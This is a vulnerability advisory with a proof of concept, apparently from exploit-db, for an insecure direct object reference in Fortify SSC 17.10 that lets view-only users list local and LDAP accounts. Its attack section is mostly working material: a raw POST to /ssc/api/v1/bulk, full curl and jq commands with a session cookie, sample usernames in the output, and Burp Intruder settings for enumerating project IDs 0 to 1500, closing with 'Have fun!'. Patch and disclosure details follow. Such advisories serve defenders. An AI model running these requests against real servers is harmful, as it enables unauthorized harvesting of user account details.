AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\r\nCWE-639\r\n\r\nDescription\r\n================\r\nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method\r\n\r\nVulnerability\r\n================\r\nFortify SSC (Software Security Center) 17.10, does not properly check ownership of \"authEntities\", which allows remote authenticated (view-only) users\r\nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities\r\n\r\nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.\r\n\r\nProof of concept\r\n================\r\n\r\nPre-requisites:\r\n\r\n- Curl command deployed (Windows or Linux)\r\n- jq command deployed (for parsing JSON fields), (Windows or Linux)\r\n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)\r\n\r\nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),\r\n\r\nThe URL normally is avaiable as following:\r\n\r\nTarget: https://fortifyserver.com/ssc/#/\r\n\r\nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default\r\n\r\nStep (4): The offending POST is:\r\n\r\nPOST /ssc/api/v1/bulk HTTP/1.1\r\nHost: fortifyserver.com\r\nConnection: close\r\nAccept: application/json, text/plain, */*\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\r\nContent-Type: application/json;charset=UTF-8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\r\nContent-Length: 123\r\n\r\n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a\r\n\r\nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'\r\n\r\nYou should see the following response:\r\n\r\n200\r\n\r\nStep (6): Now extract all local and LDAP users registered into Fortify SSC server:\r\n\r\nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field \"--data-binary\" below and change the number as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'\r\n\r\nYou should see the following response with users available\r\n\r\n\"admin\"\r\n\"sca\"\r\n\"alex\"\r\n\r\n[../snip]\r\n\r\nStep (7): Automate with BurpSuite Pro/Free choose:\r\n\r\nPayload Positions: \"Intruder Tab -> Positions\" highlight as following:\r\n\r\n-> /api/v1/projectVersions/\u00a71\u00a7/authEntities\r\n\r\nPayloads set: \"Intruder Tab -> Payloads\" with the following data:\r\n\r\n-> Payload set: 1\r\n\r\n-> Payload type: Numbers\r\n\r\nPayload Options [Numbers]:\r\n\r\n-> Type: Sequential\r\n\r\n-> From: 0\r\n\r\n-> To: 1500\r\n\r\n-> Step: 1\r\n\r\nThen start attack\u2026\r\nHave fun!\r\n\r\nHave fun!\r\n\r\nMitigations\r\n================\r\nInstall the latest patches availabe here:\r\nhttps://softwaresupport.softwaregrp.com/doc/KM03298201\r\n\r\nDisclosure policy\r\n================\r\nWe believes in responsible disclosure.\r\nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.\r\n\r\nThis vulnerability will be published if we do not receive a response to this report with 10 days.\r\n\r\nTimeline\r\n================\r\n\r\n2018-05-24: Discovered\r\n2018-05-25: Retest PRO environment\r\n2018-05-31: Vendor notification, two issues found\r\n2018-05-31: Vendor feedback received\r\n2018-06-01: Internal communication\r\n2018-06-01: Vendor feedback, two issues are confirmed\r\n2018-06-05: Vendor notification, new issue found\r\n2018-06-06: Vendor feedback, evaluating High submission\r\n2018-06-08: Vendor feedback, High issue is confirmed\r\n2018-06-19: Researcher, reminder sent\r\n2018-06-22: Vendor feedback, summary of CVEs handled as official way\r\n2018-06-26: Vendor feedback, official Hotfix for High issue available to test\r\n2018-06-29: Researcher feedback\r\n2018-07-02: Researcher feedback\r\n2018-07-04: Researcher feedback, Hotfix tested on QA environment\r\n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018\r\n2018-08-02: Reminder to vendor, feedback received OK!\r\n2018-09-26: Reminder to vendor, feedback received OK!\r\n2018-09-26: Fixes received from the vendor\r\n2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem\r\n2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem\r\n2018-10-11: Feedback from the vendor, technical details provided to the researcher\r\n2018-10-16: Fixes now tested on QA environment\r\n2018-11-08: Reminder received from the vendor, feedback provided by researcher\r\n2018-11-09: Re-rest fixes on QA environment\r\n2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed\r\n2018-11-21: Researcher feedback\r\n2018-11-23: Fixes working well/confirmed by researcher\r\n2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.\r\n2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure\r\n2018-11-26: Agreements with the vendor to publish the CVE/Advisory.\r\n2018-12-12: Public report\r\n\r\nDiscovered by:\r\nAlex Hernandez aka alt3kx:\r\n================\r\nPlease visit https://github.com/alt3kx for more information.\r\n\r\nMy current exploit list @exploit-db:\r\nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576", "sourceHref": "https://www.exploit-db.com/download/45990", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}]}

Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference

Description

Related